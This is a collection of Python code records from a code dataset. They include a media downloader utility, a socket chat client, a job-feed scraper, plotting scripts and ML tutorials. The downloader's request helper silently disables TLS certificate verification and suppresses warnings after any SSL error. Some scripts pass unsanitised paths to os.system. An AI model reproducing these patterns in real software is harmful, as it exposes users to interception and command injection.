name_all = []\n pat = \"L.jpg\"\n for file in file_list:\n fn = file.split('_')\n name_all.append(fn[0])\n if pat in file: # 判断文件名中含 pat的\n name_done.append(fn[0])\n name_ing = Counter(name_all) # 统计列表元素,返回字典\n for name in name_done:\n name_ing.pop(name) # 循环结束 name_dic 就是未下完图集的统计\n\n return name_done, name_ing\n\n\ndef is_download(pics_dic, name_done_list, name_ing_dic):\n \"\"\"判断某页本地下载情况\n 两类参数:一是从网页来的pic_dic,代表要下的内容;而是本地的下载情况,name_done_list(已经下完的图集),name_ing_dic()\n 返回 需要下载图集的2个字典 : {名:local数} & {名:url}\n \"\"\"\n name_pics_list = list(pics_dic)\n name_ing_list = list(name_ing_dic)\n done = []\n doing = {}\n undo = {}\n\n for name_pics in name_pics_list:\n if name_pics in name_done_list:\n done.append(name_pics)\n elif name_pics in name_ing_list:\n doing[name_pics] = name_ing_dic[name_pics] + 1\n else:\n undo[name_pics] = 1\n\n local_dic = undo.copy()\n local_dic.update(doing) # 融合两字典\n for name in done:\n pics_dic.pop(name)\n print(\"已经下载:\", name)\n\n return local_dic, pics_dic\n\n\ndef send_requests(url, *, method=\"get\", need=\"response\",\n referer=None, origin=None, proxy=None):\n \"\"\"\n :param url: 目标url\n :param method: 请求的方式,默认是get\n :param proxy: 请求使用的代理,默认是本机IP\n :param need: 表明需要返回的内容,有 response,soup,xpath 可选,\n response: 返回 response对象\n soup: 生成BeautifulSoup对象,调用处之后的网页解析用BeautifulSoup\n xpath: 生成etree对象,调用处之后的网页解析用xpath\n :param referer: 用于构造headers\n :param origin: 用于构造headers\n \"\"\"\n\n global response # return 不能返回比他缩进的变量,故将此变量全局化\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'}\n if referer is not None:\n headers[\"referer\"] = referer\n if origin is not None:\n headers[\"origin\"] = origin\n if proxy is None:\n proxy = {}\n # request增加代理设置 翻墙时候\n if \"127.0.0.1\" in proxy.get(\"https\", \"\") or proxy.get(\"http\", \"\"):\n opener = build_opener(ProxyHandler(proxy))\n install_opener(opener)\n\n # 循环控制变量\n verify = True\n timeout = (13, 30)\n while 1:\n try:\n response = request(method, url, headers=headers, proxies=proxy, timeout=timeout, verify=verify)\n response.close()\n if response.status_code != 200:\n print(response.status_code)\n print(\"\\r再次尝试连接\", end='')\n continue\n break\n except Timeout:\n print(\"\\r请求超时\", end='')\n timeout = (13, 60)\n continue\n except SSLError:\n print(\"\\r关闭verify\", end='')\n verify = False\n disable_warnings(exceptions.InsecureRequestWarning)\n continue\n\n # 选择返回值\n if need is \"response\":\n return response\n elif need is \"soup\":\n soup = BeautifulSoup(response.text, 'html.parser')\n return soup\n elif need is \"xpath\":\n # tree = etree.parse('xpath.html') # 本地文件打开方式\n tree = etree.HTML(response.text)\n return tree\n\n\ndef show_bar(num, nums):\n \"\"\"下载进度条\"\"\"\n\n max_tep = 50 # 进度条的长度\n a = int(num / nums * max_tep // 1)\n b = '[' + '>' * a + ' ' * (max_tep - a) + ']'\n c = str(int(100 / max_tep * a))\n print('\\r{0}{1}%'.format(b, c), end='')\n if num == nums:\n print('')\n\n\ndef deal_input_num(input_num):\n \"\"\" 数字处理from 控制台的用户输入\n 从控制台输入数字如:3 91 5-9 8\n 每个元素以空格间隔,元素形态有两种:单个数字(如 3 91)和连续范围(5-9)\n 想要得到的处理结果:[3 5 6 7 8 9 91] 即所有输入数字(int)的列表,不重复,升序\n \"\"\"\n if input_num is '':\n input_list = []\n else:\n input_list = input_num.split() # 以空格分割\n lx = [] # 连续数字 如:[1-3,3-6]\n lst = [] # 连续数字展开后 如 [1,2,3,3,4,5,6]\n for i in input_list:\n if '-' in i:\n lx.append(i) # 寻找 连续数字\n for i in lx: # 处理 连续数字\n input_list.remove(i) # 去除源列表中连续的表达式的元素 如:1-3\n i = i.split('-')\n i = [n for n in range(int(i[0]), int(i[-1]) + 1)]\n lst = lst + i\n input_list = [int(i) for i in input_list] # int型\n input_list = input_list + lst # 融合两列表\n input_list = list(set(input_list)) # 去重\n input_list.sort() # 排序:从小到大\n\n return input_list\n\n\ndef choice_download_path(path, path_default):\n \"\"\"\n 用户输入地址则使用输入地址,否则使用默认地址\n 无法判断输入地址格式是否正确\n \"\"\"\n if path is '':\n path = path_default\n if not exists(path):\n makedirs(path)\n return path\n\n\ndef merge_files(path_dir, path_file, total):\n \"\"\"\n :param path_dir: 需合并文件所在文件夹的路径\n :param path_file: 合成文件的存储路径\n :param total: 需合并文件的理想总数\n \"\"\"\n\n name_file = basename(path_file)\n # 判断ts文件是否下全了\n if len(listdir(path_dir)) == total:\n print(\"{1}开始合并:{0}{1}\".format(name_file, \"*\" * 25))\n # 合并ts\n merge = r'copy /b \"{0}\\*.ts\" \"{1}\"'.format(path_dir, path_file)\n system(merge)\n if exists(path_file):\n # 删除ts\n delete = r'rd /S/Q \"{0}\"'.format(path_dir)\n system(delete)\n sleep(0.5) # 删除文件夹有一定时间\n if not exists(path_dir):\n print(\"{1}合并成功:{0}{1}\".format(name_file, \"*\" * 25))\n else:\n print(\"删除失败\")\n else:\n print(\"合并失败\")\n else:\n print(\"ts文件未下载完全\")\n\n\nclass Multiprocess(object):\n def __init__(self, **kwargs):\n self.referer = kwargs.get(\"referer\", None)\n self.origin = kwargs.get(\"origin\", None)\n self.proxy = kwargs.get(\"proxy\", None)\n\n def process_console(self, path_dir, download_list, length, *, url_pat, pat_mode=\"naked\"):\n \"\"\"\n :param path_dir: 下载文件的存储文件夹\n :param download_list: 需要下载文件的索引列表,int型数字\n :param length: 补0用的,为了ts文件名齐整,方可正确合并\n :param url_pat: 需要下载文件的url模板,与download_list中的数字组合,即可构成完整的url\n :param pat_mode: url模板的索引要不要补0 : \"zero\":要补零; \"naked\": 不补零\n \"\"\"\n\n # 进程数\n pool = Pool(30)\n # 进程数据共享\n m = Manager()\n d = m.list()\n d.extend([0, len(download_list)])\n try:\n # ts生成器\n for i in download_list:\n i = str(i)\n # n为需要添加0的个数\n n = length - len(i)\n zero = \"0\" * n + i # 文件名要补齐,不然合并出错\n if pat_mode == \"zero\":\n index = zero\n else:\n index = i\n url_file = url_pat.format(index)\n # 需下载文件的路径\n path_file = path_dir + r'\\\\' + \"{0}.ts\".format(zero)\n # 开启异步任务\n pool.apply_async(self.download, (url_file, path_file, d))\n finally:\n pool.close()\n pool.join()\n\n def download(self, url, path, d):\n \"\"\"\n :param d: 多进程用的计数器\n \"\"\"\n args = {\n \"referer\": self.referer,\n \"origin\": self.origin,\n \"proxy\": self.proxy,\n \"need\": \"response\"\n }\n ts_stream = send_requests(url, **args)\n with open(path, \"wb\") as f:\n f.write(ts_stream.content)\n f.close()\n d[0] += 1\n show_bar(d[0], d[1])\n","sub_path":"comunits.py","file_name":"comunits.py","file_ext":"py","file_size_in_byte":10699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"446754467","text":"import unittest\n\nfrom tests.py_bindings.scenario import scenario_test, take_screenshot_scenario_test\n# import sys\n\n\ndef suite():\n return unittest.TestSuite((\n unittest.makeSuite(scenario_test.ScenarioTestCase),\n unittest.makeSuite(take_screenshot_scenario_test.TakeScreenshotScenarioTestCase)\n ))\n\n\ndef main():\n result = unittest.TextTestRunner(verbosity=2).run(suite())\n #sys.exit(not result.wasSuccessful())\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"tests/py_bindings/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"261241849","text":"import atmPy.general.timeseries as _timeseries\nimport matplotlib.pylab as plt\nfrom matplotlib.colors import LogNorm as _LogNorm\nimport numpy as _np\nfrom copy import deepcopy as _deepcopy\n\nclass Reflectivity(_timeseries.TimeSeries_2D):\n def __init__(self, *args, parent= None, **kwargs):\n super().__init__(*args ,**kwargs)\n self._parent = parent\n\n def plot(self, snr_max = None, norm = 'linear', **kwargs):\n if 'pc_kwargs' in kwargs:\n pc_kwargs = kwargs['pc_kwargs']\n else:\n pc_kwargs = {}\n\n if 'cmap' not in pc_kwargs:\n pc_kwargs['cmap'] = plt.cm.gist_gray_r\n if 'norm' not in pc_kwargs:\n if norm == 'log':\n print(norm)\n pc_kwargs['norm'] = _LogNorm()\n # if 'vmin' not in pc_kwargs:\n # pc_kwargs['vmin'] = vmin\n\n kwargs['pc_kwargs'] = pc_kwargs\n\n if snr_max:\n refl = self.copy()\n refl.data[self._parent.signal2noise_ratio.data < snr_max] = _np.nan\n out = refl.plot(norm = norm, **kwargs)\n else:\n out = super().plot(**kwargs)\n return out\n\nclass Kazr(object):\n def __init__(self):\n self._reflectivity = None\n self._signal2noise_ratio = None\n\n def average_time(self, window):\n \"\"\"\n Averages each of the relevant properties. See timeseries.TimeSeries.average_time for details.\n Parameters\n ----------\n window: tuple\n e.g. (1,'m')\n\n Returns\n -------\n Kazr instances with changes applied\n \"\"\"\n\n kzr = self.copy()\n kzr.reflectivity = kzr.reflectivity.average_time(window)\n return kzr\n\n\n def zoom_time(self, start=None, end=None, copy=True):\n kazrnew = self.copy()\n kazrnew.reflectivity = self.reflectivity.zoom_time(start=start, end=end, copy=copy)\n kazrnew.signal2noise_ratio = self.signal2noise_ratio.zoom_time(start=start, end=end, copy=copy)\n return kazrnew\n\n def discriminate_by_signal2noise_ratio(self, minimu_snr):\n \"\"\"I know there is that kwarg in the plot function which allows me to do this. This was necessary in order to\n average over time and still be able to discriminate through the snr. After averaging over time the snr is\n useless.\n\n Parameters\n ----------\n minimu_snr: float\n All values of reflectivity where the snr is smaller then that value are set to nan.\n\n Returns\n -------\n Kazr instance with changes applied\n \"\"\"\n\n kzr = self.copy()\n kzr.reflectivity.data[self.signal2noise_ratio.data < minimu_snr] = _np.nan\n return kzr\n\n @property\n def reflectivity(self):\n return self._reflectivity\n\n @reflectivity.setter\n def reflectivity(self, value, **kwargs):\n if type(value).__name__ == 'Reflectivity':\n self._reflectivity = value\n else:\n self._reflectivity = Reflectivity(value, parent = self, **kwargs)\n\n @property\n def signal2noise_ratio(self):\n return self._signal2noise_ratio\n\n @signal2noise_ratio.setter\n def signal2noise_ratio(self, value, **kwargs):\n if type(value).__name__ == 'TimeSeries_2D':\n self._signal2noise_ratio = value\n else:\n self._signal2noise_ratio = _timeseries.TimeSeries_2D(value, **kwargs)\n\n def copy(self):\n return _deepcopy(self)\n","sub_path":"atmPy/precipitation/radar.py","file_name":"radar.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"253532865","text":"from mpl_toolkits.basemap import Basemap\nfrom netCDF4 import Dataset as open_ncfile\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import BoundaryNorm\n\n#-- call function and plot figure\nfig, ax = plt.subplots(figsize=(7.5,6.5))\n\nfile = open_ncfile('rx1day_ANN_CCCMA3.1_R1_d01_1990-2009.nc')\n\n### read in coordinates\nlat = file.variables['y'][:]*(-1) ### invert latitude (not sure whether that's necessary?)\nlon = file.variables['x'][:]\n\n### read in variable and choose the 11th timestep\ndata = file.variables['rx1day'][10,:,:]\n\n#-- create map, you can change the region by defining the upper and lower lat and lon\nmap = Basemap(projection='cyl',llcrnrlat= -44.75,urcrnrlat=-10.25,\\\n resolution='c', llcrnrlon=110.,urcrnrlon=160.)\n\n#-- draw coastlines and edge of map\nmap.drawcoastlines()\nx, y = map(*np.meshgrid(lon, lat))\n\ncut_data = data[:-1, :-1]\ncmap = plt.cm.viridis_r\n\n### Reduce white areas\nplt.subplots_adjust(top=0.95, left=0.02, right=0.98, bottom=0.10,\n wspace=0.03, hspace=0.15)\n\nplt.title('Rx1day Australia')\n\nlevels = np.arange(0,110,10)\nnorm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\ncnplot = map.pcolormesh(x, y, cut_data, cmap=cmap, norm=norm)\n\n### Move colorbar horizontal or vertical direction, make it wider or change height\ncax = plt.axes([0.2, 0.1, 0.6, 0.02])\n\n### Decide whether horizonal or vertical orientation\ncbar=fig.colorbar(cnplot, orientation='horizontal', cax=cax)\ncbar.ax.tick_params(labelsize=10)\nplt.colorbar(ticks = levels, cax=cax, orientation='horizontal')\ncbar.set_label('Random PPT stat',fontsize=10)\n\n### Helps you manage white space\n\nplt.subplot_tool()\nplt.show()\n# plt.savefig('crap.png', dpi = 500)\n","sub_path":"crap_map_script.py","file_name":"crap_map_script.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352752589","text":"import socket\nimport errno\nimport sys\nfrom _datetime import datetime\nimport time\nfrom threading import Thread\n\n# initial variables\nHEADER_LENGTH = 10\nIP = '127.0.0.1'\nPORT = 1234\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect((IP,PORT))\nclient_socket.setblocking(False)\n\n# declaring username\nmy_username = input(\"Your username: \")\n\n# sending username to server\nusername = my_username.encode('utf-8')\nusername_header = f'{len(username):<{HEADER_LENGTH}}'.encode('utf-8')\nclient_socket.send(username_header+username)\n\n\n# successful connection\nwhile True:\n date_time_stamp = datetime.fromtimestamp(time.time())\n message = input(f\"[{date_time_stamp.strftime('%Y-%m-%d %H:%M:%S')}]: {my_username} > \")\n\n # if message is written - print it for client and send to server\n if message:\n message = message.encode('utf-8')\n message_header = f'{len(message) :< {HEADER_LENGTH}}'.encode('utf-8')\n client_socket.send(message_header + message)\n try:\n # receive messages\n while True:\n username_header = client_socket.recv(HEADER_LENGTH)\n if not len(username_header):\n print(\"Connection closed by the server\")\n sys.exit()\n\n # decoding message\n username_length = int(username_header.decode('utf-8').strip())\n username = client_socket.recv(username_length).decode('utf-8')\n message_header = client_socket.recv(HEADER_LENGTH)\n message_length = int(message_header.decode('utf-8').strip())\n message = client_socket.recv(message_length).decode('utf-8')\n\n # printing message with system time from client [should be from server - working on it]\n date_time_stamp = datetime.fromtimestamp(time.time())\n print(f\"[{date_time_stamp.strftime('%Y-%m-%d %H:%M:%S')}]: {username} > {message}\")\n\n\n# handling exceptions\n except IOError as e:\n if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n print('Reading error', str(e))\n sys.exit()\n continue\n\n except Exception as e:\n print('General error',str(e))\n sys.exit()\n\n\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191662121","text":"import os\n\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n# pd.set_option('display.width', None)\n# pd.set_option('display.max_columns', None)\nimport numpy as np\n\nfrom sklearn import preprocessing\nfrom sklearn.naive_bayes import GaussianNB, ComplementNB\nfrom sklearn.metrics import accuracy_score\n\n#df_train = pd.read_csv(os.path.join('.', 'data', 'processed', 'train.csv'))\ndf_train = pd.read_csv(os.path.join('.', 'data', 'processed', 'train_balanced.csv'))\ndf_train = df_train.sample(frac=1).reset_index(drop=True)\ndf_test = pd.read_csv(os.path.join('.', 'data', 'processed', 'test.csv'))\ndf_test = df_test.sample(frac=1).reset_index(drop=True)\n\nFEATURES = [\n\t# 'UserID',\n\t# 'UUID',\n\t# 'Version',\n\t# 'TimeStemp',\n\t'GyroscopeStat_x_MEAN',\n\t'GyroscopeStat_z_MEAN',\n\t'GyroscopeStat_COV_z_x',\n\t'GyroscopeStat_COV_z_y',\n\t#'MagneticField_x_MEAN',\n\t#'MagneticField_z_MEAN',\n\t#'MagneticField_COV_z_x',\n\t#'MagneticField_COV_z_y',\n\t#'Pressure_MEAN',\n\t'LinearAcceleration_COV_z_x',\n\t'LinearAcceleration_COV_z_y',\n\t'LinearAcceleration_x_MEAN',\n\t'LinearAcceleration_z_MEAN',\n\t# 'attack'\n\t]\n\nX_train = df_train[FEATURES]\nX_test = df_test[FEATURES]\n\ny_train = df_train['attack']\ny_test = df_test['attack']\n\n## [ NORMALIZATION ]\nscaler = preprocessing.MinMaxScaler().fit(X_train)\nX_train = scaler.transform(X_train)\n\nX_test = scaler.transform(X_test)\n\n\n## [ NAIVE-BAYES MODEL ]\n\n#model = GaussianNB()\nmodel = ComplementNB()\nmodel.fit(X_train, y_train)\n\ny_pred = model.predict(X_test)\n\nacc = accuracy_score(y_test, y_pred)\nprint(\"Accuracy:\", acc)\n\n# metrics calculation\nfrom sklearn.metrics import mean_absolute_error\nmae = mean_absolute_error(y_test, y_pred)\nprint(\"MAE:\", mae)\n\n\nxx = np.stack(i for i in range(len(y_test)))\nplt.scatter(xx, y_test, c='r', label='data')\nplt.plot(xx, y_pred, c='g', label='prediction')\nplt.axis('tight')\nplt.legend()\nplt.title('Component NaiveBayes')\nplt.show()\n\n\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils.multiclass import unique_labels\n\ndef plot_confusion_matrix(y_true, y_pred, classes,\n normalize=False,\n title=None,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if not title:\n if normalize:\n title = 'Normalized confusion matrix'\n else:\n title = 'Confusion matrix, without normalization'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n classes = classes[unique_labels(y_true, y_pred)]\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n # ... and label them with the respective list entries\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\n rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n return ax\n\nplot_confusion_matrix(y_test, y_pred , classes = unique_labels(y_test, y_pred), normalize=True,\n title='Normalized confusion matrix')\n\nplt.ylim((-0.5, 1.5))\nplt.show()","sub_path":"Task3/src/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"361874999","text":"import tensorflow as tf\nimport os\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n\ndef linear_model_fn():\n\n # Model parameters\n W = tf.Variable([.3], tf.float32)\n b = tf.Variable([-.3], tf.float32)\n\n # Model input and output\n x = tf.placeholder(tf.float32)\n linear_model = W * x + b\n y = tf.placeholder(tf.float32)\n\n # loss\n loss = tf.reduce_sum(tf.square(linear_model - y)) # sum of the squares\n\n # optimizer\n optimizer = tf.train.GradientDescentOptimizer(0.01)\n train = optimizer.minimize(loss)\n\n # training data\n x_train = [1, 2, 3, 4]\n y_train = [0, -1, -2, -3]\n\n # training loop\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init) # reset values to wrong\n for i in range(1000):\n sess.run(train, {x: x_train, y: y_train})\n\n # evaluate training accuracy\n curr_W, curr_b, curr_loss = sess.run([W, b, loss], {x: x_train, y: y_train})\n print(\"W: %s b: %s loss: %s\" % (curr_W, curr_b, curr_loss))\n return 0\n\ndef linear_model_fn_simple():\n # Declare list of features. We only have one real-valued feature. There are many\n # other types of columns that are more complicated and useful.\n features = [tf.contrib.layers.real_valued_column(\"x\", dimension=1)]\n\n # An estimator is the front end to invoke training (fitting) and evaluation\n # (inference). There are many predefined types like linear regression,\n # logistic regression, linear classification, logistic classification, and\n # many neural network classifiers and regressors. The following code\n # provides an estimator that does linear regression.\n estimator = tf.contrib.learn.LinearRegressor(feature_columns=features)\n\n # TensorFlow provides many helper methods to read and set up data sets.\n # Here we use `numpy_input_fn`. We have to tell the function how many batches\n # of data (num_epochs) we want and how big each batch should be.\n x = np.array([1., 2., 3., 4.])\n y = np.array([0., -1., -2., -3.])\n input_fn = tf.contrib.learn.io.numpy_input_fn({\"x\": x}, y, batch_size=4,\n num_epochs=1000)\n\n # We can invoke 1000 training steps by invoking the `fit` method and passing the\n # training data set.\n estimator.fit(input_fn=input_fn, steps=1000)\n\n # Here we evaluate how well our model did. In a real example, we would want\n # to use a separate validation and testing data set to avoid overfitting.\n estimator.evaluate(input_fn=input_fn)\n\n return 0\n\ndef mnist_fn():\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n print(\"tu\")\n\n x = tf.placeholder(tf.float32, [None, 784])\n\n W = tf.Variable(tf.zeros([784, 10]))\n b = tf.Variable(tf.zeros([10]))\n\n y = tf.nn.softmax(tf.matmul(x, W) + b)\n\n y_ = tf.placeholder(tf.float32, [None, 10])\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n sess = tf.InteractiveSession()\n\n tf.global_variables_initializer().run()\n\n for _ in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n print(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\nif __name__ == \"__main__\":\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n mnist_fn()\n\n print(1)\n","sub_path":"tensorFlow_get_started.py","file_name":"tensorFlow_get_started.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260992200","text":"import logging\n\nimport requests\n\nfrom main import app\n\n\ndef get_api_url(endpoint):\n return \"http://{}:{}{}\".format(app.config['API_HOSTNAME'], app.config['API_PORT'], endpoint)\n\n\ndef get_user_id():\n # TODO: remove once login functionality has been made\n r = requests.get(get_api_url('/user/default_user'))\n data = r.json()\n return data['user_id']\n\n\ndef get_default_house_id():\n return get_current_user_houses()[0][\"house_id\"]\n\n\ndef get_current_user_houses():\n return get_houses_for_user(get_user_id())\n\n\ndef get_houses_for_user(user_id):\n r = requests.get(get_api_url('/user/{}/houses'.format(user_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['houses']\n\n\ndef get_user_default_rooms():\n r = requests.get(get_api_url('/house/{}/rooms'.format(get_default_house_id())))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['rooms']\n\n\ndef get_default_house_id_for_user(user_id):\n return get_houses_for_user(user_id)[0][\"house_id\"]\n\n\ndef get_default_rooms_for_user(user_id):\n r = requests.get(get_api_url('/house/{}/rooms'.format(get_default_house_id_for_user(user_id))))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['rooms']\n\n\ndef add_new_device(name, device_type, vendor, configuration):\n r = requests.post(get_api_url('/house/{}/devices/add'.format(get_default_house_id())),\n json={\"name\": name,\n \"configuration\": configuration,\n \"device_type\": device_type,\n \"vendor\": vendor})\n logging.debug(\"Received from add new device: {}\".format(r.content))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']['_id']\n\n\ndef add_new_room(name):\n r = requests.post(get_api_url('/house/{}/rooms/add'.format(get_default_house_id())),\n json={\"name\": name})\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['room']['room_id']\n\n\ndef get_user_default_devices():\n r = requests.get(get_api_url('/house/{}/devices'.format(get_default_house_id())))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data[\"devices\"]\n\n\ndef get_room_devices(room_id):\n r = requests.get(get_api_url('/room/{}/devices'.format(room_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['devices']\n\n\ndef link_device_to_room(room_id, device_id):\n r = requests.get(get_api_url('/room/{}/device/{}/link'.format(room_id, device_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']['device_id']\n\n\ndef get_house_info(house_id):\n r = requests.get(get_api_url('/house/{}'.format(house_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['house']\n\n\ndef get_room_info(room_id):\n r = requests.get(get_api_url('/room/{}'.format(room_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['room']\n\n\ndef get_device_info(device_id):\n r = requests.get(get_api_url('/device/{}'.format(device_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']\n\n\ndef set_thermostat_target(device_id, target_temperature):\n r = requests.post(get_api_url('/device/{}/thermostat/configure'.format(device_id)),\n json={\"target_temperature\": target_temperature})\n print(r.content)\n data = r.json()\n if data['error'] is not None:\n raise Exception('Error!')\n return data['device']\n\n\ndef set_switch_state(device_id, state):\n r = requests.post(get_api_url('/device/{}/switch/configure'.format(device_id)),\n json={\"power_state\": state})\n print(r.content)\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['device']\n\n\ndef get_faulty_devices():\n r = requests.get(get_api_url('/devices/faulty'))\n data = r.json()\n if data['error'] is not None:\n raise Exception('Error!')\n return data['devices']\n\n\ndef get_user_info(user_id):\n r = requests.get(get_api_url(\"/user/{}\".format(user_id)))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data[\"user\"]\n\n\ndef get_all_users():\n r = requests.get(get_api_url(\"/users\"))\n data = r.json()\n if data['error'] is not None:\n raise Exception(\"Error!\")\n return data['users']\n","sub_path":"website/data_interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"490973187","text":"\"\"\"\n GovernmentJobsXML spider created on top of the XMLSpider\n\nscrapy crawl governmentjobs_xml -a mining_job_id=999 -a iteration=1 -a extract=1 -a url=\"https://www.governmentjobs.com/SearchEngine/IndeedJobsFeed\"\n\nsample url:\n https://www.governmentjobs.com/SearchEngine/IndeedJobsFeed\n\"\"\"\n\nfrom re import compile\nfrom urlparse import urlparse\nfrom brightcorp.base.xmlspider import XMLSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix, NormalizedJoin\n\n\nclass GovernmentJobsXML(XMLSpider):\n\n name = 'governmentjobs_xml'\n tag = 'job'\n follow_job_url = False\n DATE_REGEX = compile(r'^(.*?\\d{4})\\s*\\d{2}:\\d{2}:')\n\n date_xpath = '//date/text()'\n fields = {\n 'url': '//url/text()',\n 'apply_url': '//url/text()',\n 'title': '//title/text()',\n 'company': '//company/text()',\n 'description': '//description/text()',\n 'jobcategory': '//category/text()',\n 'jobtype': '//jobtype/text()',\n }\n\n location_xpaths = [\n '//city/text()',\n '//state/text()',\n '//country/text()'\n ]\n\n def __init__(self, *args, **kwargs):\n super(GovernmentJobsXML, self).__init__(*args, **kwargs)\n\n self.domain = urlparse(self.start_urls[0]).netloc.split('.')[1]\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n for field, xpath in self.fields.iteritems():\n loader.add_xpath(field, xpath)\n\n loader.add_xpath(\n 'location', self.location_xpaths, NormalizedJoin(', ')\n )\n loader.add_xpath(\n 'referencenumber',\n '//referencenumber/text()',\n Prefix('%s-' % self.domain)\n )\n loader.add_xpath(\n 'date',\n self.date_xpath,\n ConvertDateString('%a, %d %b %Y'),\n re=self.DATE_REGEX\n )\n\n yield loader.load_item()","sub_path":"brightcorp/brightcorp/spiders/governmentjobs_xml.py","file_name":"governmentjobs_xml.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"587101780","text":"#!/usr/bin/python\n\nfrom sys import argv\nfrom os import system\nfrom os.path import abspath\n\n\ngdt_file = argv[1]\n\ngdt_servers_file = gdt_file.replace( '.txt','_servers.txt')\nsystem( 'grep _TS %s > %s' % ( gdt_file, gdt_servers_file ) )\n\ngdt_submissions_file = gdt_file.replace( '.txt','_submissions.txt')\nsystem( 'grep casp %s > %s' % ( gdt_file, gdt_submissions_file ) )\n\ngnuplot_file = 'make_gdt_histograms.gplot'\nfid = open( gnuplot_file, 'w' )\n\nfid.write( 'plot \"< histo.py %s 4 0.005 0 1.0\" u 1:2 w lines\\n' % gdt_servers_file )\nfid.write( 'replot \"< histo.py %s 4 0.005 0 1.0\" u 1:2 w lines lt 3\\n' % gdt_submissions_file )\nfid.write( 'set title \"%s\"\\n' % abspath( gdt_file) )\n\nfid.write( 'set term post color\\n' )\nfid.write( 'set out \"gdt_histograms.ps\" \\n')\n\nfid.write( 'replot\\n' )\nfid.write( 'set term x11\\n' )\nfid.write( 'set out\\n' )\n\nfid.close()\n\nsystem( 'gnuplot %s ' % gnuplot_file 